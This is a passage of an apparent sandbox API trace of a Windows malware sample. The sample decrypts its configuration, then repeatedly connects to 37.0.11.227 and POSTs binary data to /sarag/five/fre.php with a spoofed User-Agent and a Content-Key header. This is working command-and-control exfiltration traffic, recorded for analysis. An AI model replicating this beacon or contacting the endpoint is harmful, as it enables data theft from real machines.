() returned 0x690000 [0319.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0319.488] send (s=0xae8, buf=0x6ad508*, len=242, flags=0) returned 242 [0319.488] send (s=0xae8, buf=0x6aba40*, len=159, flags=0) returned 159 [0319.488] GetProcessHeap () returned 0x690000 [0319.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0319.488] recv (in: s=0xae8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0319.635] GetProcessHeap () returned 0x690000 [0319.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0319.635] GetProcessHeap () returned 0x690000 [0319.636] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0319.636] GetProcessHeap () returned 0x690000 [0319.636] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0319.636] GetProcessHeap () returned 0x690000 [0319.636] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0319.636] closesocket (s=0xae8) returned 0 [0319.637] GetProcessHeap () returned 0x690000 [0319.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0319.637] GetProcessHeap () returned 0x690000 [0319.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0319.637] GetProcessHeap () returned 0x690000 [0319.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0319.638] GetProcessHeap () returned 0x690000 [0319.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0319.638] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1830) returned 0xae8 [0319.640] Sleep (dwMilliseconds=0xea60) [0319.641] GetProcessHeap () returned 0x690000 [0319.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0319.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.649] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0319.655] GetProcessHeap () returned 0x690000 [0319.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0319.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.781] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0319.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.782] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.782] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.783] GetProcessHeap () returned 0x690000 [0319.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0319.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.784] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0319.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.785] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0319.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.786] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0319.786] GetProcessHeap () returned 0x690000 [0319.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0319.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.787] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.788] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.790] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.791] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.791] GetProcessHeap () returned 0x690000 [0319.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0319.791] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.792] GetProcessHeap () returned 0x690000 [0319.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0319.793] GetProcessHeap () returned 0x690000 [0319.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0319.793] GetProcessHeap () returned 0x690000 [0319.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0319.794] GetProcessHeap () returned 0x690000 [0319.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0319.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.795] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.801] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0319.806] GetProcessHeap () returned 0x690000 [0319.806] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0319.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.807] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0319.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.808] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.808] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.809] GetProcessHeap () returned 0x690000 [0319.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0319.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.810] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0319.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.878] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0319.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.879] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0319.879] GetProcessHeap () returned 0x690000 [0319.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0319.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.880] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0319.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.889] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0319.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.898] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0319.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.899] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0319.899] GetProcessHeap () returned 0x690000 [0319.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0319.899] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0319.900] GetProcessHeap () returned 0x690000 [0319.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0319.900] socket (af=2, type=1, protocol=6) returned 0xaec [0319.901] connect (s=0xaec, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0320.048] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0320.048] GetProcessHeap () returned 0x690000 [0320.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0320.048] GetProcessHeap () returned 0x690000 [0320.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0320.049] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0320.050] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0320.050] GetProcessHeap () returned 0x690000 [0320.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0320.050] GetProcessHeap () returned 0x690000 [0320.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0320.051] GetProcessHeap () returned 0x690000 [0320.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0320.051] GetProcessHeap () returned 0x690000 [0320.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0320.052] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0320.052] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0320.052] GetProcessHeap () returned 0x690000 [0320.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0320.052] GetProcessHeap () returned 0x690000 [0320.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0320.053] send (s=0xaec, buf=0x6ad508*, len=242, flags=0) returned 242 [0320.053] send (s=0xaec, buf=0x6aba40*, len=159, flags=0) returned 159 [0320.053] GetProcessHeap () returned 0x690000 [0320.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0320.054] recv (in: s=0xaec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0320.131] GetProcessHeap () returned 0x690000 [0320.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0320.131] GetProcessHeap () returned 0x690000 [0320.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0320.132] GetProcessHeap () returned 0x690000 [0320.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0320.132] GetProcessHeap () returned 0x690000 [0320.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0320.134] closesocket (s=0xaec) returned 0 [0320.135] GetProcessHeap () returned 0x690000 [0320.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0320.135] GetProcessHeap () returned 0x690000 [0320.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0320.135] GetProcessHeap () returned 0x690000 [0320.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0320.136] GetProcessHeap () returned 0x690000 [0320.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0320.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1834) returned 0xaec [0320.137] Sleep (dwMilliseconds=0xea60) [0320.139] GetProcessHeap () returned 0x690000 [0320.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0320.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.140] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.146] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0320.151] GetProcessHeap () returned 0x690000 [0320.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0320.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.152] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0320.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.153] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.154] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.154] GetProcessHeap () returned 0x690000 [0320.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0320.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.156] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0320.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.157] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0320.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.158] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0320.158] GetProcessHeap () returned 0x690000 [0320.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0320.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.160] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.161] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.162] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.163] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.163] GetProcessHeap () returned 0x690000 [0320.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0320.163] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.163] GetProcessHeap () returned 0x690000 [0320.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0320.164] GetProcessHeap () returned 0x690000 [0320.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0320.164] GetProcessHeap () returned 0x690000 [0320.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0320.164] GetProcessHeap () returned 0x690000 [0320.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0320.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.165] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.169] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0320.174] GetProcessHeap () returned 0x690000 [0320.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0320.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.175] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0320.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.175] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.176] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.176] GetProcessHeap () returned 0x690000 [0320.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0320.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.177] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0320.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.178] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0320.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.179] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0320.179] GetProcessHeap () returned 0x690000 [0320.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0320.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.180] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0320.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.181] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0320.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.182] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0320.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.183] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0320.183] GetProcessHeap () returned 0x690000 [0320.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0320.183] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0320.183] GetProcessHeap () returned 0x690000 [0320.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0320.183] socket (af=2, type=1, protocol=6) returned 0xaf0 [0320.183] connect (s=0xaf0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0320.206] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0320.206] GetProcessHeap () returned 0x690000 [0320.206] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0320.206] GetProcessHeap () returned 0x690000 [0320.206] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0320.207] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0320.208] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0320.208] GetProcessHeap () returned 0x690000 [0320.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0320.208] GetProcessHeap () returned 0x690000 [0320.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0320.208] GetProcessHeap () returned 0x690000 [0320.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0320.208] GetProcessHeap () returned 0x690000 [0320.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0320.209] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0320.210] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0320.210] GetProcessHeap () returned 0x690000 [0320.210] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0320.210] GetProcessHeap () returned 0x690000 [0320.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0320.210] send (s=0xaf0, buf=0x6ad508*, len=242, flags=0) returned 242 [0320.211] send (s=0xaf0, buf=0x6aba40*, len=159, flags=0) returned 159 [0320.211] GetProcessHeap () returned 0x690000 [0320.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0320.211] recv (in: s=0xaf0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0320.288] GetProcessHeap () returned 0x690000 [0320.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0320.289] GetProcessHeap () returned 0x690000 [0320.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0320.289] GetProcessHeap () returned 0x690000 [0320.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0320.290] GetProcessHeap () returned 0x690000 [0320.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0320.290] closesocket (s=0xaf0) returned 0 [0320.291] GetProcessHeap () returned 0x690000 [0320.291] HeapFree (in: hHeap=0x690000, 